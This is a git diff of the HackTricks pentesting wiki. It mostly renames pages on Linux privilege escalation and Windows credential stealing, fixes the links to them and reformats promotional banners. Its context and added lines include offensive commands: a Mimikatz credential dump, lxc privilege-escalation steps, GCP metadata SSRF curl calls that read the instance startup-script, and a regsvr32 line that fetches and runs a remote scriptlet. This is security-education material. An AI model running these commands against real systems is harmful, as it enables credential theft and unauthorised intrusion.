diff --git a/SUMMARY.md b/SUMMARY.md index 5e600649b..22d317c6d 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -103,8 +103,8 @@ * [Logstash](linux-hardening/privilege-escalation/logstash.md) * [Node inspector/CEF debug abuse](linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md) * [D-Bus Enumeration & Command Injection Privilege Escalation](linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md) - * [Interesting Groups - Linux Privesc](linux-hardening/privilege-escalation/interesting-groups-linux-privesc/README.md) - * [lxd/lxc Group - Privilege escalation](linux-hardening/privilege-escalation/interesting-groups-linux-privesc/lxd-privilege-escalation.md) + * [Interesting Groups - Linux Privesc](linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md) + * [lxd/lxc Group - Privilege escalation](linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md) * [ld.so privesc exploit example](linux-hardening/privilege-escalation/ld.so.conf-example.md) * [Linux Active Directory](linux-hardening/privilege-escalation/linux-active-directory.md) * [Linux Capabilities](linux-hardening/privilege-escalation/linux-capabilities.md) @@ -215,13 +215,13 @@ * [WinRM](windows-hardening/ntlm/winrm.md) * [WmicExec](windows-hardening/ntlm/wmicexec.md) * [Pivoting to the Cloud](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements) -* [Stealing Windows Credentials](windows-hardening/stealing-windows-credentials/README.md) - * [Windows Credentials Protections](windows-hardening/stealing-windows-credentials/windows-credentials-protections.md) - * [Mimikatz](windows-hardening/stealing-windows-credentials/credentials-mimikatz.md) -* [Basic Win CMD for Pentesters](windows-hardening/basic-win-cmd-for-pentesters.md) +* [Stealing Windows Credentials](windows-hardening/stealing-credentials/README.md) + * [Windows Credentials Protections](windows-hardening/stealing-credentials/credentials-protections.md) + * [Mimikatz](windows-hardening/stealing-credentials/credentials-mimikatz.md) +* [Basic Win CMD for Pentesters](windows-hardening/basic-cmd-for-pentesters.md) * [Basic PowerShell for Pentesters](windows-hardening/basic-powershell-for-pentesters/README.md) * [PowerView/SharpView](windows-hardening/basic-powershell-for-pentesters/powerview.md) -* [AV Bypass](windows-hardening/windows-av-bypass.md) +* [AV Bypass](windows-hardening/av-bypass.md) ## 📱 Mobile Pentesting diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md index 260564bdf..525924f4c 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md @@ -204,7 +204,7 @@ The **`$BitMap`** is a special file within the NTFS file system. This file keeps ### ADS (Alternate Data Stream) Alternate data streams allow files to contain more than one stream of data. Every file has at least one data stream. In Windows, this default data stream is called `:$DATA`.\ -In this [page you can see different ways to create/access/discover alternate data streams](../../../windows-hardening/basic-win-cmd-for-pentesters.md#alternate-data-streams-cheatsheet-ads-alternate-data-stream) from the console. In the past, this cause a vulnerability in IIS as people were able to access the source code of a page by accessing the `:$DATA` stream like `http://www.alternate-data-streams.com/default.asp::$DATA`. +In this [page you can see different ways to create/access/discover alternate data streams](../../../windows-hardening/basic-cmd-for-pentesters.md#alternate-data-streams-cheatsheet-ads-alternate-data-stream) from the console. In the past, this cause a vulnerability in IIS as people were able to access the source code of a page by accessing the `:$DATA` stream like `http://www.alternate-data-streams.com/default.asp::$DATA`. Using the tool [**AlternateStreamView**](https://www.nirsoft.net/utils/alternate\_data\_streams.html) you can search and export all the files with some ADS. diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md index 6c97f9cf5..e00399ace 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md @@ -152,7 +152,7 @@ The plugin `banners.Banners` can be used in **vol3 to try to find linux banners* ## Hashes/Passwords -Extract SAM hashes, [domain cached credentials](../../../windows-hardening/stealing-windows-credentials/windows-credentials-protections.md#cached-credentials) and [lsa secrets](../../../windows-hardening/authentication-credentials-uac-and-efs.md#lsa-secrets). +Extract SAM hashes, [domain cached credentials](../../../windows-hardening/stealing-credentials/credentials-protections.md#cached-credentials) and [lsa secrets](../../../windows-hardening/authentication-credentials-uac-and-efs.md#lsa-secrets). {% tabs %} {% tab title="vol3" %} diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md index 25d68dd86..58c95b252 100644 --- a/generic-methodologies-and-resources/pentesting-methodology.md +++ b/generic-methodologies-and-resources/pentesting-methodology.md @@ -91,7 +91,7 @@ Specially in Windows you could need some help to **avoid antiviruses**: \[Check If you have troubles with the shell, you can find here a small **compilation of the most useful commands** for pentesters: * [**Linux**](../linux-hardening/useful-linux-commands/) -* [**Windows (CMD)**](../windows-hardening/basic-win-cmd-for-pentesters.md) +* [**Windows (CMD)**](../windows-hardening/basic-cmd-for-pentesters.md) * [**Winodows (PS)**](../windows-hardening/basic-powershell-for-pentesters/) ### **9 -** [**Exfiltration**](exfiltration.md) @@ -108,7 +108,7 @@ You should also check this pages about how does **Windows work**: * [**Authentication, Credentials, Token privileges and UAC**](../windows-hardening/authentication-credentials-uac-and-efs.md) * How does [**NTLM works**](../windows-hardening/ntlm/) -* How to [**steal credentials**](../windows-hardening/stealing-windows-credentials/) in Windows +* How to [**steal credentials**](../windows-hardening/stealing-credentials/) in Windows * Some tricks about [_**Active Directory**_](../windows-hardening/active-directory-methodology/) **Don't forget to checkout the best tools to enumerate Windows and Linux local Privilege Escalation paths:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) @@ -122,7 +122,7 @@ Here you can find a [**methodology explaining the most common actions to enumera #### **11**.1 - Looting Check if you can find more **passwords** inside the host or if you have **access to other machines** with the **privileges** of your **user**.\ -Find here different ways to [**dump passwords in Windows**](../windows-hardening/stealing-windows-credentials/). +Find here different ways to [**dump passwords in Windows**](../windows-hardening/stealing-credentials/). #### 11.2 - Persistence diff --git a/linux-hardening/linux-privilege-escalation-checklist.md b/linux-hardening/linux-privilege-escalation-checklist.md index a5d336924..96dcdab95 100644 --- a/linux-hardening/linux-privilege-escalation-checklist.md +++ b/linux-hardening/linux-privilege-escalation-checklist.md @@ -91,7 +91,7 @@ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among * [ ] Generic users/groups **enumeration** * [ ] Do you have a **very big UID**? Is the **machine** **vulnerable**? -* [ ] Can you [**escalate privileges thanks to a group**](privilege-escalation/interesting-groups-linux-privesc/) you belong to? +* [ ] Can you [**escalate privileges thanks to a group**](privilege-escalation/interesting-groups-linux-pe/) you belong to? * [ ] **Clipboard** data? * [ ] Password Policy? * [ ] Try to **use** every **known password** that you have discovered previously to login **with each** possible **user**. Try to login also without a password. diff --git a/linux-hardening/privilege-escalation/README.md b/linux-hardening/privilege-escalation/README.md index 7a81a5e23..ecefe85b8 100644 --- a/linux-hardening/privilege-escalation/README.md +++ b/linux-hardening/privilege-escalation/README.md @@ -638,7 +638,7 @@ Now, you can execute commands on the container from this `socat` connection. ### Others -Note that if you have write permissions over the docker socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-privesc/#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising). +Note that if you have write permissions over the docker socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-pe/#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising). Check **more ways to break out from docker or abuse it to escalate privileges** in: @@ -775,8 +775,8 @@ Some Linux versions were affected by a bug that allows users with **UID > INT\_M Check if you are a **member of some group** that could grant you root privileges: -{% content-ref url="interesting-groups-linux-privesc/" %} -[interesting-groups-linux-privesc](interesting-groups-linux-privesc/) +{% content-ref url="interesting-groups-linux-pe/" %} +[interesting-groups-linux-pe](interesting-groups-linux-pe/) {% endcontent-ref %} ### Clipboard @@ -1500,7 +1500,7 @@ aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g" grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null ``` -In order to **read logs the group** [**adm**](interesting-groups-linux-privesc/#adm-group) will be really helpful. +In order to **read logs the group** [**adm**](interesting-groups-linux-pe/#adm-group) will be really helpful. ### Shell files diff --git a/linux-hardening/privilege-escalation/interesting-groups-linux-privesc/README.md b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md similarity index 90% rename from linux-hardening/privilege-escalation/interesting-groups-linux-privesc/README.md rename to linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md index 2e4672fa6..43f72fe53 100644 --- a/linux-hardening/privilege-escalation/interesting-groups-linux-privesc/README.md +++ b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md @@ -1,14 +1,14 @@ -# Interesting Groups - Linux PE +# Interesting Groups - Linux Privesc
-🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 +🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
@@ -215,12 +215,12 @@ These permissions may be abused with the following exploit to **escalate privile
-🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 +🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
diff --git a/linux-hardening/privilege-escalation/interesting-groups-linux-privesc/lxd-privilege-escalation.md b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md similarity index 73% rename from linux-hardening/privilege-escalation/interesting-groups-linux-privesc/lxd-privilege-escalation.md rename to linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md index 2aaa4f811..25601075d 100644 --- a/linux-hardening/privilege-escalation/interesting-groups-linux-privesc/lxd-privilege-escalation.md +++ b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md @@ -1,27 +1,22 @@ - +# lxd/lxc Group - Privilege escalation
-🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 +🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
- If you belong to _**lxd**_ **or** _**lxc**_ **group**, you can become root -# Exploiting without internet +## Exploiting without internet -## Method 1 +### Method 1 You can install in your machine this distro builder: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)(follow the instructions of the github): @@ -74,7 +69,7 @@ lxc exec privesc /bin/sh [email protected]:~# cd /mnt/root #Here is where the filesystem is mounted ``` -## Method 2 +### Method 2 Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem. @@ -104,7 +99,7 @@ lxc exec mycontainer /bin/sh Alternatively [https://github.com/initstring/lxd\_root](https://github.com/initstring/lxd\_root) -# With internet +## With internet You can follow [these instructions](https://reboare.github.io/lxd/lxd-escape.html). @@ -116,25 +111,18 @@ lxc exec test bash [email protected]:~# cd /mnt/root #Here is where the filesystem is mounted ``` -# Other Refs +## Other Refs {% embed url="https://reboare.github.io/lxd/lxd-escape.html" %} -
-🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 +🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
- - diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md index 72b52ed39..d68fbbd26 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md +++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md @@ -201,9 +201,11 @@ curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/ins # Name curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/name # Tags -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/scheduling/tags +curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/scheduling/tags # Zone -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/zone +curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/zone +# User data +curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/attributes/startup-script" # Network Interfaces for iface in $(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/"); do echo " IP: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/ip") diff --git a/windows-hardening/active-directory-methodology/README.md b/windows-hardening/active-directory-methodology/README.md index b408df987..3868cb6e2 100644 --- a/windows-hardening/active-directory-methodology/README.md +++ b/windows-hardening/active-directory-methodology/README.md @@ -171,7 +171,7 @@ Having compromised an account is a **big step to start compromising the whole do Regarding [**ASREPRoast**](asreproast.md) you can now find every possible vulnerable user, and regarding [**Password Spraying**](password-spraying.md) you can get a **list of all the usernames** and try the password of the compromised account, empty passwords and new promising passwords. -* You could use the [**CMD to perform a basic recon**](../basic-win-cmd-for-pentesters.md#domain-info) +* You could use the [**CMD to perform a basic recon**](../basic-cmd-for-pentesters.md#domain-info) * You can also use [**powershell for recon**](../basic-powershell-for-pentesters/) which will be stealthier * You ca also [**use powerview**](../basic-powershell-for-pentesters/powerview.md) to extract more detailed information * Another amazing tool for recon in an active directory is [**BloodHound**](bloodhound.md). It is **not very stealthy** (depending on the collection methods you use), but **if you don't care** about that, you should totally give it a try. Find where users can RDP, find path to other groups, etc. @@ -254,7 +254,7 @@ This vulnerability allowed any authenticated user to **compromise the domain con Hopefully you have managed to **compromise some local admin** account using [AsRepRoast](asreproast.md), [Password Spraying](password-spraying.md), [Kerberoast](kerberoast.md), [Responder](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) including relaying, [EvilSSDP](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md), [escalating privileges locally](../windows-local-privilege-escalation/).\ Then, its time to dump all the hashes in memory and locally.\ -[**Read this page about different ways to obtain the hashes.**](../stealing-windows-credentials/) +[**Read this page about different ways to obtain the hashes.**](../stealing-credentials/) ### Pass the Hash @@ -383,7 +383,7 @@ Once you get **Domain Admin** or even better **Enterprise Admin** privileges, yo [**More information about DCSync attack can be found here**](dcsync.md). -[**More information about how to steal the NTDS.dit can be found here**](../stealing-windows-credentials/) +[**More information about how to steal the NTDS.dit can be found here**](../stealing-credentials/) ### Privesc as Persistence @@ -672,7 +672,7 @@ Moreover, if the **victim mounted his hard drive**, from the **RDP session** pro ## Some General Defenses -[**Learn more about how to protect credentials here.**](../stealing-windows-credentials/windows-credentials-protections.md)\ +[**Learn more about how to protect credentials here.**](../stealing-credentials/credentials-protections.md)\ **Please, find some migrations against each technique in the description of the technique.** * Not allow Domain Admins to login on any other hosts apart from Domain Controllers diff --git a/windows-hardening/windows-av-bypass.md b/windows-hardening/av-bypass.md similarity index 100% rename from windows-hardening/windows-av-bypass.md rename to windows-hardening/av-bypass.md diff --git a/windows-hardening/basic-win-cmd-for-pentesters.md b/windows-hardening/basic-cmd-for-pentesters.md similarity index 95% rename from windows-hardening/basic-win-cmd-for-pentesters.md rename to windows-hardening/basic-cmd-for-pentesters.md index 9bf5adf01..f60a44631 100644 --- a/windows-hardening/basic-win-cmd-for-pentesters.md +++ b/windows-hardening/basic-cmd-for-pentesters.md @@ -1,14 +1,14 @@ -# Basic CMD for Pentesters +# Basic Win CMD for Pentesters
-🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 +🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
@@ -672,12 +672,12 @@ regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSB
-🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 +🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
diff --git a/windows-hardening/ntlm/README.md b/windows-hardening/ntlm/README.md index 6042cf3c7..456c5a976 100644 --- a/windows-hardening/ntlm/README.md +++ b/windows-hardening/ntlm/README.md @@ -189,7 +189,7 @@ wce.exe -s ::: ## Extracting credentials from a Windows Host -**For more information about** [**how to obtain credentials from a Windows host you should read this page**](../stealing-windows-credentials/)**.** +**For more information about** [**how to obtain credentials from a Windows host you should read this page**](../stealing-credentials/)**.** ## NTLM Relay and Responder diff --git a/windows-hardening/stealing-windows-credentials/README.md b/windows-hardening/stealing-credentials/README.md similarity index 98% rename from windows-hardening/stealing-windows-credentials/README.md rename to windows-hardening/stealing-credentials/README.md index 3bdd08331..52198b942 100644 --- a/windows-hardening/stealing-windows-credentials/README.md +++ b/windows-hardening/stealing-credentials/README.md @@ -49,7 +49,7 @@ Invoke-Mimikatz -DumpCreds #Dump creds from memory Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"' ``` -[**Learn about some possible credentials protections here.**](windows-credentials-protections.md) **This protections could prevent Mimikatz from extracting some credentials.** +[**Learn about some possible credentials protections here.**](credentials-protections.md) **This protections could prevent Mimikatz from extracting some credentials.** ## Credentials with Meterpreter @@ -330,7 +330,7 @@ Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco ## Defenses -[**Learn about some credentials protections here.**](windows-credentials-protections.md) +[**Learn about some credentials protections here.**](credentials-protections.md) ​ diff --git a/windows-hardening/stealing-windows-credentials/credentials-mimikatz.md b/windows-hardening/stealing-credentials/credentials-mimikatz.md similarity index 93% rename from windows-hardening/stealing-windows-credentials/credentials-mimikatz.md rename to windows-hardening/stealing-credentials/credentials-mimikatz.md index 6bcf8866d..2fbe7e0ae 100644 --- a/windows-hardening/stealing-windows-credentials/credentials-mimikatz.md +++ b/windows-hardening/stealing-credentials/credentials-mimikatz.md @@ -2,17 +2,13 @@
-🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 +🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
@@ -339,16 +335,12 @@ Find a domain admin credential on the box and use that token: _token::elevate /d
